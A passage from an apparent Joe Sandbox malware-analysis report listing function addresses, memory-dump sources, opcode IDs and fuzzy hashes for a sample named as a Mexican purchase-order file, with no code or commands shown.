                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8140000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 61191dbbe308a258d4a8d49d5bb4988f0ca9ea80129fa3845bbba4ea51cae3e1
                                                                            • Instruction ID: 83c787741aa144c6bd77dd3577a198d6c1e4fba7b806ffe9e1819785198ef042
                                                                            • Opcode Fuzzy Hash: 61191dbbe308a258d4a8d49d5bb4988f0ca9ea80129fa3845bbba4ea51cae3e1
                                                                            • Instruction Fuzzy Hash: 2A21EF347014158FCB08BBBCF898A2E77FAFF88610B4408ADE40AD7391CE349C0583A5
                                                                            Function 08140006 Relevance: .1, Instructions: 89COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2986222602.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8140000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1060a495205397d2471e5a99e2a9f7af312772f9a85b223924fbae5e09e037b8
                                                                            • Instruction ID: d8ebb21e7ebf91604364537d4c28375ee632d3081d2703c0d94530456c0a209b
                                                                            • Opcode Fuzzy Hash: 1060a495205397d2471e5a99e2a9f7af312772f9a85b223924fbae5e09e037b8
                                                                            • Instruction Fuzzy Hash: 694139B0C05388DFDB12CFA9D99478DBFF0AF4A710F19809AD545BB252C379584ACB61
                                                                            Function 00BF9DF8 Relevance: .1, Instructions: 88COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2979901997.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_bf0000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7d0e7b9e901d51f571a2b18b4cd8ce4972ed79e3becdaee14004ce571604a23a
                                                                            • Instruction ID: 33b2919a3136565969889af20f996c58f79ac2473e28675b8ed914300ec5f439
                                                                            • Opcode Fuzzy Hash: 7d0e7b9e901d51f571a2b18b4cd8ce4972ed79e3becdaee14004ce571604a23a
                                                                            • Instruction Fuzzy Hash: 52318471A005098FCB14DF6CC884AAEBBF6FF84314B198199E655DB3A5CB349C46CB90
                                                                            Function 00BFD230 Relevance: .1, Instructions: 87COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2979901997.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_bf0000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ba0592ac06a7d6a4f7f54cbec4a084c1a5eb7379e4ed2dbfb872db0694ee4481
                                                                            • Instruction ID: 28ef2bea5f3cea888b086d26167093c631b57fbb7e769d0375e2c11caefa1cc2
                                                                            • Opcode Fuzzy Hash: ba0592ac06a7d6a4f7f54cbec4a084c1a5eb7379e4ed2dbfb872db0694ee4481
                                                                            • Instruction Fuzzy Hash: 9621D0307002094BDB141A2AC498B3E76D7EFC9709F1844B9D702CB798DE65CC89E3C6
                                                                            Function 00BFC19C Relevance: .1, Instructions: 81COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2979901997.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_bf0000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e92d89e4ce2dce2a2b33f0b3eb78dc849987bcfdd315c9a8e30522698bfcdb04
                                                                            • Instruction ID: d3ce65871aa32221efc94600486328cd80d3048755704537e7cffd455227400b
                                                                            • Opcode Fuzzy Hash: e92d89e4ce2dce2a2b33f0b3eb78dc849987bcfdd315c9a8e30522698bfcdb04
                                                                            • Instruction Fuzzy Hash: 99314A35905208CFDB14CFA4C194AECBFF0EF0A315F245099D141AB2A2C7749A8ACF14
                                                                            Function 00BF7F2F Relevance: .1, Instructions: 77COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2979901997.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_bf0000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1894a2e169c8e270b2cff054fc9b54e1a3226a4675aa9309c57c930dcc82d6d6
                                                                            • Instruction ID: 29526c17c7cdc8a9136ad007825b2c193f057db2decd1c91258685d45b012760
                                                                            • Opcode Fuzzy Hash: 1894a2e169c8e270b2cff054fc9b54e1a3226a4675aa9309c57c930dcc82d6d6
                                                                            • Instruction Fuzzy Hash: B121D335745A528FC7159B28D46893EB3E2FF8975071545F9E606CB391CE30DC0A87C0
                                                                            Function 00B9D4CC Relevance: .1, Instructions: 75COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2979693119.0000000000B9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B9D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_b9d000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6736fbc154d4803f244c0090b5dcffe21dd1fb9b427cfa3f26fc16f77f3992c8
                                                                            • Instruction ID: 783f5d0cf2f71adea670b4d5afb9a5e4a125701dd3ecf1aa25a67002dae65b83
                                                                            • Opcode Fuzzy Hash: 6736fbc154d4803f244c0090b5dcffe21dd1fb9b427cfa3f26fc16f77f3992c8
                                                                            • Instruction Fuzzy Hash: 0F21D6B2504244DFDF05DF15D9C0B26BFA5FBA4318F24C5B9D9090B256C336D856CBA1
                                                                            Function 00BAD01C Relevance: .1, Instructions: 72COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2979740714.0000000000BAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BAD000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_bad000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f76c799935a0200434ac3ab114924b50718884071b643fa1d7abd7ea4c225a0e
                                                                            • Instruction ID: 58085a275081053d401af6c795bbf2c0f8401b9e37d342b6f182a9b9cc734e64
                                                                            • Opcode Fuzzy Hash: f76c799935a0200434ac3ab114924b50718884071b643fa1d7abd7ea4c225a0e
                                                                            • Instruction Fuzzy Hash: 86213475608300EFCB24DF24D9D0B26BBA1FB89314F20C5ADD90B4B692C77AD807CA61
                                                                            Function 00BAD1D4 Relevance: .1, Instructions: 72COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2979740714.0000000000BAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BAD000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_bad000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4be423d903e55caae96ee19aa82898a8f4aa24f49bce6985f8829d20dfdf35ac
                                                                            • Instruction ID: 6aa3662387176089689942fae5dab2246297b7987c49f8b612f6db06b75bb1d4
                                                                            • Opcode Fuzzy Hash: 4be423d903e55caae96ee19aa82898a8f4aa24f49bce6985f8829d20dfdf35ac
                                                                            • Instruction Fuzzy Hash: F6210475608304EFDB05DF14D9C0B26BBA5FB85314F20C5ADE90A4B692C77AD846CA61
                                                                            Function 08140930 Relevance: .1, Instructions: 71COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2986222602.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8140000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9fe3dce9eab20a4606cca5b24fcecfa29b2b4babbf04a1d2c2df3ea5420c191d
                                                                            • Instruction ID: 03ab8ffff0ac0aecf2e9eb524addf586fedfd00319e84eaef468bc5a70e1292e
                                                                            • Opcode Fuzzy Hash: 9fe3dce9eab20a4606cca5b24fcecfa29b2b4babbf04a1d2c2df3ea5420c191d
                                                                            • Instruction Fuzzy Hash: 563104B0C01218DFDB14CF9AD984B9EBBF5EF48710F209019E409B7240C7B59885CBA0
                                                                            Function 00BFEA19 Relevance: .1, Instructions: 65COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2979901997.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_bf0000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 17c1bb53e70c5804615b5a0a82bb935fdda58dacd8af5cec87c2cbd1b6cdb259
                                                                            • Instruction ID: b846afce6997b1c1a2570ac919da697e8a434a5d5e1da7fa663e4cad4e8dce24
                                                                            • Opcode Fuzzy Hash: 17c1bb53e70c5804615b5a0a82bb935fdda58dacd8af5cec87c2cbd1b6cdb259
                                                                            • Instruction Fuzzy Hash: 3E213934E0125C9FDB05CFA5D554ABEBFF6BF88304F1480A9E511A7264E735EA44DB20
                                                                            Function 08140040 Relevance: .1, Instructions: 64COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2986222602.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8140000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3debc1559c9e9566ef12b9a955d0aba0354dac6455aa58a0e8bc65daf150105d
                                                                            • Instruction ID: 9154946e91bbfba12b91981fb5a8e25831aa9b6f0f591ebe806b8d652081092d
                                                                            • Opcode Fuzzy Hash: 3debc1559c9e9566ef12b9a955d0aba0354dac6455aa58a0e8bc65daf150105d
                                                                            • Instruction Fuzzy Hash: 3021CEB0D01758DFDB20CF9AD984B9EBFF4AF48714F24901AE505BB240C7B59845CBA1
                                                                            Function 00BF79D7 Relevance: .1, Instructions: 63COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2979901997.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_bf0000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a9d6d47d1e78c73b3ab0162f57dad1bf5e11a42618f4b138e66f318f26f864a2
                                                                            • Instruction ID: 9b895aeef08b9bd7bb17a8824d5495835ab677e97601f76962952ae9b23859cb
                                                                            • Opcode Fuzzy Hash: a9d6d47d1e78c73b3ab0162f57dad1bf5e11a42618f4b138e66f318f26f864a2
                                                                            • Instruction Fuzzy Hash: 15110034A88119CFC7009A24D44CA6DBBE2EB85311F1584EADA05CB242DB70DD59CB91
                                                                            Function 00BF8010 Relevance: .1, Instructions: 62COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2979901997.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_bf0000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f16b2e9a8fa77716a13d096228f2dbeb96c399fefe211d98a8b7585a2666ced9
                                                                            • Instruction ID: 4988c1638e6d32dc51a3a882828f4226662244eedf68d22f98dbb492c6a237ad
                                                                            • Opcode Fuzzy Hash: f16b2e9a8fa77716a13d096228f2dbeb96c399fefe211d98a8b7585a2666ced9
                                                                            • Instruction Fuzzy Hash: 0E118C703002058FD754AE39D494A29B7D1FF8978079544FFE64ACB362DE62DC098760
                                                                            Function 00BAD006 Relevance: .1, Instructions: 60COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2979740714.0000000000BAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BAD000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_bad000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 020c6fbddc535d3ea95626fc5fca05d219d9abbc35945143ea790cdf3ec813bf
                                                                            • Instruction ID: a2bc6f4a0ef2e9204431304bd3ef0f06d8a383ce7d31ea7d88813e9ef3e79dee
                                                                            • Opcode Fuzzy Hash: 020c6fbddc535d3ea95626fc5fca05d219d9abbc35945143ea790cdf3ec813bf
                                                                            • Instruction Fuzzy Hash: 082184755093808FCB16CF20D594715BFB1EB46314F28C5DAD8498B6A7C33AD80ACB62
                                                                            Function 00BF7F40 Relevance: .1, Instructions: 59COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2979901997.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_bf0000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 179e51a2dda08d51bd5f1ae6f7c1902b531f7ced2fe2bbc5dd853b14b92e00da
                                                                            • Instruction ID: 5233048267a860ddd153edb8eb591e7bef8fe64a8298a19c29fbf000495721d6
                                                                            • Opcode Fuzzy Hash: 179e51a2dda08d51bd5f1ae6f7c1902b531f7ced2fe2bbc5dd853b14b92e00da
                                                                            • Instruction Fuzzy Hash: ED11CE357856168BC7199A29D46893EB7E6FF8976071544F9EA06CB390CF20DC068BD0
                                                                            Function 00BF4B98 Relevance: .1, Instructions: 57COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2979901997.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_bf0000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f5125cb6bce46f3d057ce0f7cf691b9351e4da25aa6a8faf16604d314f34e58e
                                                                            • Instruction ID: 9351f5399b59e5cdd10d59641539e5d7911ecbd0b336cd6f514f30742421e0f7
                                                                            • Opcode Fuzzy Hash: f5125cb6bce46f3d057ce0f7cf691b9351e4da25aa6a8faf16604d314f34e58e
                                                                            • Instruction Fuzzy Hash: 572153B5D04208CFCB00CFA8C894AEEBBF1EF49300F1460AAD606A7361DB34A949DF14
                                                                            Function 00B9D4C7 Relevance: .1, Instructions: 56COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2979693119.0000000000B9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B9D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_b9d000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                                            • Instruction ID: 36fe9d5f04f224de3dd73277d6b1a80a74184baeb82cf8d77c484d52c82f7d48
                                                                            • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                                            • Instruction Fuzzy Hash: 9611D3B6504284CFCF05CF10D5C4B16BFB2FBA4314F24C6A9D8090B266C33AD856CBA1
                                                                            Function 081430A9 Relevance: .1, Instructions: 55COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2986222602.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8140000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3a3ae19c9241c345311baf6d57ed24ada6da6ef5ee041ddb2ce3ee9a97baa728
                                                                            • Instruction ID: 7944951eb50fbc77d9714e6fab1012854730df82fdaf31e7a133e4e945f1fc1f
                                                                            • Opcode Fuzzy Hash: 3a3ae19c9241c345311baf6d57ed24ada6da6ef5ee041ddb2ce3ee9a97baa728
                                                                            • Instruction Fuzzy Hash: F801F1767046251B9B16E62E9C409BFB7EB9FC91213168429D148D7344DF308C0342A0
                                                                            Function 00BAD1CF Relevance: .1, Instructions: 53COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2979740714.0000000000BAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BAD000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_bad000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                            • Instruction ID: 4ece3a09c3971e60b79909003b5ac8330b7bc41c19d7267f29afced88b0d80b3
                                                                            • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                            • Instruction Fuzzy Hash: E6118B75508384DFCB15CF10D5C4B15BBA1FB85314F24C6A9D84A4B6A6C33AD84ACB61
                                                                            Function 00BF5100 Relevance: .0, Instructions: 49COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2979901997.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_bf0000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 882e783d3ada7205a194612f0d98c86a3735cdc25dc71ca3c34a9b806d3f968c
                                                                            • Instruction ID: ea229d2d8a3dca515168d7e816fd8c4ce8500e73f723d7576c0d746b2069fa1a
                                                                            • Opcode Fuzzy Hash: 882e783d3ada7205a194612f0d98c86a3735cdc25dc71ca3c34a9b806d3f968c
                                                                            • Instruction Fuzzy Hash: 67117971D0065A8BDB19DFAA84043EEBFF6AF89310F04C56AD624A7250EB74065ACB90
                                                                            Function 08142418 Relevance: .0, Instructions: 48COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2986222602.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8140000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 866d9bf362f6ee81ee4071efd531b12082086f119c44bb2a6046bf37c1fead15
                                                                            • Instruction ID: ce34a01439bfb192f7e19ded68dff229778082cc17d55a0c3cbb61dbe712d380
                                                                            • Opcode Fuzzy Hash: 866d9bf362f6ee81ee4071efd531b12082086f119c44bb2a6046bf37c1fead15
                                                                            • Instruction Fuzzy Hash: EC11C871D0070A8ECB10EFA9C5405EEFBF4EF49310B15966AE558B7211E730EA81CB90
                                                                            Function 00BF5660 Relevance: .0, Instructions: 47COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2979901997.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_bf0000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 07a7c613b82b886912986eab246d461842e13e78a63285dca9c775694126dc88
                                                                            • Instruction ID: f0eeebf57228c16028981619e4b419956ec8ad9a0c23d8c58832defb45024799
                                                                            • Opcode Fuzzy Hash: 07a7c613b82b886912986eab246d461842e13e78a63285dca9c775694126dc88
                                                                            • Instruction Fuzzy Hash: 2411D075E006098FDB04DFAAD944AEDBBF5AF89300F108069E518A7360DB359945CF64
                                                                            Function 00BF565B Relevance: .0, Instructions: 47COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2979901997.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_bf0000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: bfe5464150e5b97ca2b0d58ec393d800053ed70f8ee31a214bc79a4eb78af5a1
                                                                            • Instruction ID: 063253105478cc94715c36f6913b9db899efee1da89ba4d7b1ce2ecd5a6efe4d
                                                                            • Opcode Fuzzy Hash: bfe5464150e5b97ca2b0d58ec393d800053ed70f8ee31a214bc79a4eb78af5a1
                                                                            • Instruction Fuzzy Hash: 0311D375E006098FDB04DFA9D944AEDBBF2AF89300F148069E518B7360DB359946CF14
                                                                            Function 00B9D849 Relevance: .0, Instructions: 45COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2979693119.0000000000B9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B9D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_b9d000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 646b1a80d085b542775c6c1f0966355fccf99546464b9dd1df6c3acdfd17d2b1
                                                                            • Instruction ID: a754d9d859cbf52772f70f3340b6fa1643af773cb29c42aa8739b998f4d40fef
                                                                            • Opcode Fuzzy Hash: 646b1a80d085b542775c6c1f0966355fccf99546464b9dd1df6c3acdfd17d2b1
                                                                            • Instruction Fuzzy Hash: 9801F271504340DAEB209B27CDC0B66BFD8DF41324F1885BAED081A293C6B89840C6B1
                                                                            Function 081403F4 Relevance: .0, Instructions: 40COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2986222602.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8140000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: fc7b834aa8859f854ee2c164d435a3aae7bf3164fa1f50a80e0fb732a18c750c
                                                                            • Instruction ID: bdf34dca97e0a428073cea1ef629a7ab3e264e3e87f4317a65bf1127af6fa851
                                                                            • Opcode Fuzzy Hash: fc7b834aa8859f854ee2c164d435a3aae7bf3164fa1f50a80e0fb732a18c750c
                                                                            • Instruction Fuzzy Hash: 9C018070800618DFDB24CF6AC8487ED7BF0BF48311F28962CE524AB191D3744A46CF90
                                                                            Function 08142FA0 Relevance: .0, Instructions: 38COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2986222602.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8140000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d5a0336a358e56b288b72a719f6a8d03a1888ede6473e078f6f398422240ee4b
                                                                            • Instruction ID: d1b8c6fe7ecdf5398bb2330e1435e62ddb54a162c6f354005ce4a9b06c4a7ae6
                                                                            • Opcode Fuzzy Hash: d5a0336a358e56b288b72a719f6a8d03a1888ede6473e078f6f398422240ee4b
                                                                            • Instruction Fuzzy Hash: 24F090317082545FD7048B6AD880D6BBFF9FFCA62072541AFE045DB362C6709C05C760
                                                                            Function 00B9D848 Relevance: .0, Instructions: 36COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2979693119.0000000000B9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B9D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_b9d000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3c1f59d730ae9e0da171d87adc3045ec2e4574ea096730280b304a1d6822b72f
                                                                            • Instruction ID: b92ed5ded0c7f2901e4d097e183f69be890b35eebb57e89dd1f0b3740238f4d9
                                                                            • Opcode Fuzzy Hash: 3c1f59d730ae9e0da171d87adc3045ec2e4574ea096730280b304a1d6822b72f
                                                                            • Instruction Fuzzy Hash: A0F062714053449AEB109B16DDC4B62FFE8EB91734F18C5AAED485A287C3799844CAB1
                                                                            Function 08140400 Relevance: .0, Instructions: 34COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2986222602.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8140000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7e80242256cb3e957f7e04bf5b58893b5ee524749330c7d5b5a7d70a75f70f07
                                                                            • Instruction ID: c0652f243118928723c485a8ee5f015be5ab8e8ee5506f8792607fc4523fe0c4
                                                                            • Opcode Fuzzy Hash: 7e80242256cb3e957f7e04bf5b58893b5ee524749330c7d5b5a7d70a75f70f07
                                                                            • Instruction Fuzzy Hash: 0C01FB70900619DFDB14DFAAC8047AEBAF1BF48351F159629E528AA290D7744A85CFA0
                                                                            Function 00BF8020 Relevance: .0, Instructions: 32COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2979901997.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_bf0000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4e0e49c953f2cf388eca41a0374f20ee60a8708ac9e6f45ef75205ef4a93ec54
                                                                            • Instruction ID: 348a9c74b01f058e90fbb9926d7cfb757bbe58e3f2a400f7da5d39de35f23225
                                                                            • Opcode Fuzzy Hash: 4e0e49c953f2cf388eca41a0374f20ee60a8708ac9e6f45ef75205ef4a93ec54
                                                                            • Instruction Fuzzy Hash: 62F065713002099FC7549E6AD494B2AB7D9FF85B5075440BFE619CB352DE22DC49C7A0
                                                                            Function 08142FB0 Relevance: .0, Instructions: 30COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
